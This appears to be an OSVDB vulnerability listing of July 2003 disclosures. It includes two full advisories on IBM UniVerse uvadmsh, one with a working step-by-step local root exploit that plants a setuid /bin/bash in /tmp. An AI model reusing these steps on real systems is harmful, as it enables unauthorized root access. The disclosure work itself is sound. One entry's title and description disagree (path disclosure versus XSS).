| OSVDB ID | Disclosure Date | Title |

| 8584 | 2003-07-16 | IRIX nsd Minus Entry Improper User Control Access |
Description: IRIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the Name Service Daemon (nsd) checks the /etc/group file to determine levels of access based upon plus (+) or minus (-) entries. As /etc/group does not have minus (-) entries, nsd processes group membership entries when they should not be processed, resulting in improper user access control. This flaw may lead to a loss of integrity.

| 8587 | 2003-07-16 | IRIX nsd Unspecified Memory Consumption DoS |
Description: IRIX contains a flaw that may allow a remote denial of service. The issue is triggered when a malicious attacker causes the Name Service Daemon (nsd) to consume all system memory via dynamic maps, and will result in loss of availability for the platform.

| 8588 | 2003-07-16 | IRIX nsd DNS callbacks Unspecified Issue |
Description: (Description Provided by CVE): The DNS callbacks in nsd in SGI IRIX 6.5.x through 6.5.20f, and possibly earlier versions, do not perform sufficient sanity checking, with unknown impact.

| 8857 | 2003-07-16 | Ultimate Bulletin Board Infopop Cookie XSS |
Description: (Description Provided by CVE): Cross-site scripting (XSS) vulnerability in Infopop Ultimate Bulletin Board (UBB) 6.x allows remote authenticated users to execute arbitrary web script and gain administrative access via the "displayed name" attribute of the "ubber" cookie.

| 11458 | 2003-07-16 | Digi-ads admin.php Admin Username Cookie Authentication Bypass |
Description: (Description Provided by CVE): admin.php in Digi-ads 1.1 allows remote attackers to bypass authentication via a cookie with the username set to the name of the administrator, which satisfies an improper condition in admin.php that does not require a correct password.

| 11459 | 2003-07-16 | Digi-news admin.php Admin Username Cookie Authentication Bypass |
Description: (Description Provided by CVE): admin.php in Digi-news 1.1 allows remote attackers to bypass authentication via a cookie with the username set to the name of the administrator, which satisfies an improper condition in admin.php that does not require a correct password.

| 11669 | 2003-07-16 | PHP php_check_safe_mode_include_dir Function Safemode Bypass |
Description: (Description Provided by CVE): The php_check_safe_mode_include_dir function in fopen_wrappers.c of PHP 4.3.x returns a success value (0) when the safe_mode_include_dir variable is not specified in configuration, which differs from the previous failure value and may allow remote attackers to exploit file include vulnerabilities in PHP applications.

| 11785 | 2003-07-16 | BRU Command Line Argument Format String Local Privilege Escalation |
Description: (Description Provided by CVE): Format string vulnerability in Backup and Restore Utility for Unix (BRU) 17.0 and earlier, when running setuid, allows local users to execute arbitrary code via format string specifiers in a command line argument.

| 2318 | 2003-07-15 | IBM U2 UniVerse uvadm overflows |
Description:

Thanks to IBM for being so receptive with these issues. For those of you that have requested we revive the old "Snosoft" advisories, we have begun placing our legacy advisories at http://www.secnetops.biz as time permits. -KF

Attachment: SRT2003-07-08-1223.txt

Secure Network Operations, Inc.
http://www.secnetops.com
Strategic Reconnaissance Team: [email protected]
Team Lead Contact: [email protected]

Our Mission:
Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer.

Quick Summary:
Advisory Number     : SRT2003-07-08-1223
Product             : IBM U2 UniVerse
Version             : Version <= 10.0.0.9 ?
Vendor              : http://ibm.com/software/data/u2/universe/
Class               : local
Criticality         : High (to UniVerse servers with local users)
Operating System(s) : Only confirmed on Linux (other unix based?)

High Level Explanation
High Level Description : uvadm can take root via buffer overflows
What to do             : chmod -s /usr/ibm/uv/bin/uvadmsh

Technical Details
Proof Of Concept Status : SNO does have PoC code
Low Level Description   : UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across Microsoft(R) Windows(R) NT, Linux and UNIX platforms.

The uvadm user may exploit a buffer overflow in the uvadmsh binary to take root. There is a buffer overflow when processing command line arguments. Please note that without the -uv.install argument this issue is NOT exploitable; however, the overflow still occurs.

    (gdb) r -uv.install `perl -e 'print "Z" x 546'`
    Starting program: uvadmsh -uv.install `perl -e 'print "Z" x 546'`
    error
    Program received signal SIGSEGV, Segmentation fault.
    0x5a5a5a5a in ?? ()
    (gdb) bt
    #0  0x5a5a5a5a in ?? ()
    Cannot access memory at address 0x5a5a5a5a

You must have uvadm rights in order to exploit this issue. The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successful installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration.

    [uvadm@vegeta tmp]$ id
    uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)
    [uvadm@vegeta tmp]$ ./uvadm_root.pl
    error
    sh-2.05b# id
    uid=0(root) gid=503(uvadm) groups=503(uvadm)

Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh
Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions.

Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per-client basis at IBM's discretion.

Bugtraq URL : to be assigned

This advisory was released by Secure Network Operations, Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact [email protected] for information on how to obtain exploit information.

| 2313 | 2003-07-15 | IBM U2 UniVerse uvadmsh Overflow |
Description:

Thanks to IBM for being so receptive with these issues. For those of you that have requested we revive the old "Snosoft" advisories, we have begun placing our legacy advisories at http://www.secnetops.biz as time permits. -KF

Attachment: SRT2003-07-07-0833.txt

Secure Network Operations, Inc.
http://www.secnetops.com
Strategic Reconnaissance Team: [email protected]
Team Lead Contact: [email protected]

Our Mission:
Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer.

Quick Summary:
Advisory Number     : SRT2003-07-07-0833
Product             : IBM U2 UniVerse
Version             : Version <= 10.0.0.9 ?
Vendor              : http://ibm.com/software/data/u2/universe/
Class               : local
Criticality         : High (to UniVerse servers with local users)
Operating System(s) : Only confirmed on Linux (other unix based?)

High Level Explanation
High Level Description : users with uvadm rights can take root
What to do             : chmod -s /usr/ibm/uv/bin/uvadmsh

Technical Details
Proof Of Concept Status : SNO does have PoC code for this issue.
Low Level Description   : UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across Microsoft(R) Windows(R) NT, Linux and UNIX platforms.

The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successful installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration. The uvadmsh program checks the user's name against the string "uvadm", which means in order to exploit this issue you need to have access to the user uvadm.

    [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp
    ...
    strcmp("kf", "uvadm") = -1
    [uvadm@vegeta uvadm]$ id
    uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)

You will note that with the proper uid the binary begins looking for the command line option "-uv.install", which is the path to a binary file to execute.

    [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp
    ...
    strcmp("uvadm", "uvadm") = 0
    strcmp("-uv.install", "-uv.install") = 0

This condition is fairly easy to take advantage of, as you can see here.

    [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
    main() {
        setuid(0);
        system("cc -o /tmp/owned /tmp/owned.c");
        system("chmod 4755 /tmp/owned");
    }
    [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
    [uvadm@vegeta uvadm]$ cat > /tmp/owned.c
    main() {
        setuid(0);
        system("/bin/bash");
    }
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    ls: /tmp/owned: No such file or directory
    [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    -rwsr-xr-x    1 root     uvadm       11640 Jul  2 20:15 /tmp/owned
    [uvadm@vegeta uvadm]$ /tmp/owned
    [root@vegeta uvadm]# id
    uid=0(root) gid=503(uvadm) groups=503(uvadm)

Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh
Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions.

Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per-client basis at IBM's discretion.

Bugtraq URL : to be assigned

This advisory was released by Secure Network Operations, Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact [email protected] for information on how to obtain exploit information.

| 2312 | 2003-07-15 | IBM U2 UniVerse cci_dir Symlink Arbitrary File Overwrite Local Privilege Escalation |
Description: (Description Provided by CVE): cci_dir in IBM U2 UniVerse 10.0.0.9 and earlier creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.

| 25382 | 2003-07-15 | IBM WebSphere Application Server (WAS) ConnectionFactories Binding Info Unspecified Issue |
Description: Unknown / Incomplete

| 27816 | 2003-07-15 | SimpNews eventcal2.php.php path_simpnews Parameter Remote File Inclusion |
Description: Unknown / Incomplete

| 27817 | 2003-07-15 | SimpNews eventscroller.php path_simpnews Parameter Remote File Inclusion |
Description: Unknown / Incomplete

| 3373 | 2003-07-15 | Invision Power File Manager Unspecified Issue |
Description: Invision Power File Manager contains a nondescript vulnerability. Currently, the vendor has not released any details regarding the nature of the vulnerability, but has classified it as "severe". The issue is due to unspecified problems in the index.php and/or edit.php scripts.

| 9190 | 2003-07-15 | Splatt Forum Post Icon Field XSS |
Description: (Description Provided by CVE): Cross-site scripting (XSS) vulnerability in Splatt Forum allows remote attackers to insert arbitrary HTML and web script via the post icon (image_subject) field.

| 9673 | 2003-07-15 | IBM U2 UniVerse uvadmsh uv.install PATH Subversion Privilege Escalation |
Description: (Description Provided by CVE): uvadmsh in IBM U2 UniVerse 10.0.0.9 and earlier trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user.

| 9683 | 2003-07-15 | IBM U2 UniVerse cci_dir File Manipulation Privilege Escalation |
Description: (Description Provided by CVE): cci_dir in IBM U2 UniVerse 10.0.0.9 and earlier creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.

| 12020 | 2003-07-15 | Falcon's Eye falconseye -s Option Local Overflow |
Description: (Description Provided by CVE): Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.

| 60576 | 2003-07-15 | Citadel/UX Configuration Import Remote Overflow |
Description: Unknown / Incomplete

| 2317 | 2003-07-14 | nfs-utils mountd xlog Function Off-by-one Remote Overflow |
Description: nfs-utils contains a flaw that allows a remote attacker to gain root privileges. The issue is due to a buffer overflow caused by an off-by-one error in the "xlog" function. If an attacker creates a specially crafted RPC request to the rpc.mountd daemon, they may be able to execute arbitrary code.

| 6270 | 2003-07-14 | Netscape Client Detection Tool (CDT) plugin (npcdt.dll) Attachment Filename Overflow |
Description: A remote overflow exists in Netscape Navigator. The issue is due to improper bounds checking in the npcdt.dll plug-in, resulting in a buffer overflow. By creating a malicious file with an overly long file name, an attacker can cause arbitrary code execution, resulting in a loss of integrity.

| 2305 | 2003-07-14 | e107 class2.php Multiple Parameter XSS |
Description: e107 contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate e107 custom tags upon submission to the class2.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

| 18723 | 2003-07-14 | IBM Tivoli SecureWay WebSEAL user-and-group LDAP ACL Bypass |
Description: Unknown / Incomplete

| 20081 | 2003-07-14 | Hitachi Groupmax Server Divided Email Virus Scan Bypass |
Description: Unknown / Incomplete

| 3684 | 2003-07-14 | OpenSSL ASN.1 Client Certificate Double-free Arbitrary Code Execution |
Description: A double-free memory allocation error allows remote attackers to cause a denial of service (crash) and may allow the execution of arbitrary code via an SSL client certificate with crafted invalid ASN.1 encoding.

| 3686 | 2003-07-14 | OpenSSL ASN.1 Client Certificate Remote Overflow DoS |
Description: A remote overflow exists in OpenSSL. OpenSSL fails to correctly parse ASN.1 tags in OpenSSL client certificates, resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service in OpenSSL or an application using it, resulting in a loss of availability.

| 4738 | 2003-07-14 | McAfee WebShield Attachment Content Filter Bypass |
Description: Unknown / Incomplete

| 8647 | 2003-07-14 | ImageMagick File Name Format String |
Description: (Description Provided by CVE): ImageMagick 5.4.3.x and earlier allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via a "%x" filename, possibly triggering a format string vulnerability.

| 11803 | 2003-07-14 | TrueType Font Server for X11 (xfstt) Malformed Packet Remote Overflow |
Description: (Description Provided by CVE): X Fontserver for Truetype fonts (xfstt) 1.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a (1) FS_QueryXExtents8 or (2) FS_QueryXBitmaps8 packet, and possibly other types of packets, with a large num_ranges value, which causes an out-of-bounds array access.

| 11832 | 2003-07-14 | NeoModus Direct Connect Connection Flood DoS |
Description: (Description Provided by CVE): NeoModus Direct Connect 1.0 build 9, and possibly other versions, allows remote attackers to cause a denial of service (connection and possibly memory exhaustion) via a flood of ConnectToMe requests containing arbitrary IP addresses and ports.

| 32090 | 2003-07-13 | Twilight Utilities Web Server (TW-webserver) GET Request Overflow DoS |
Description: (Description Provided by CVE): Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service (application crash) via a GET request for a long URI, a different vulnerability than CVE-2004-2376.

| 14717 | 2003-07-13 | WebGUI Error Message Admin Username Information Disclosure |
Description: Unknown / Incomplete

| 2316 | 2003-07-13 | MDaemon IMAP4 Server SEARCH Command Remote Overflow |
Description: Unknown / Incomplete

| 2314 | 2003-07-13 | MDaemon IMAP4 Server EXAMINE Command Remote Overflow |
Description: Unknown / Incomplete

| 11892 | 2003-07-12 | Polycom MGC 25 User Request Saturation DoS |
Description: (Description Provided by CVE): Polycom MGC 25 allows remote attackers to cause a denial of service (crash) via a large number of "user" requests to the control port 5003, as demonstrated using the blast TCP stress tester.

| 18018 | 2003-07-11 | VP-ASP Shopping Cart shopexd.asp Unspecified Issue |
Description: Unknown / Incomplete

| 3170 | 2003-07-11 | w-Agora profile.php XSS |
Description: W-Agora contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate variables upon submission to the profile.php3 script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

| 3172 | 2003-07-11 | w-Agora modules.php Path Disclosure |
Description: W-Agora contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the mod and file variables upon submission to the modules.php3 script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

| 3173 | 2003-07-11 | w-Agora index.php Information Disclosure |
Description: W-Agora contains a feature that may lead to an unauthorized information disclosure. The issue is triggered when index.php is requested with "about" or "info" as the query, which discloses user names, database systems, paths, and versions, resulting in a loss of confidentiality.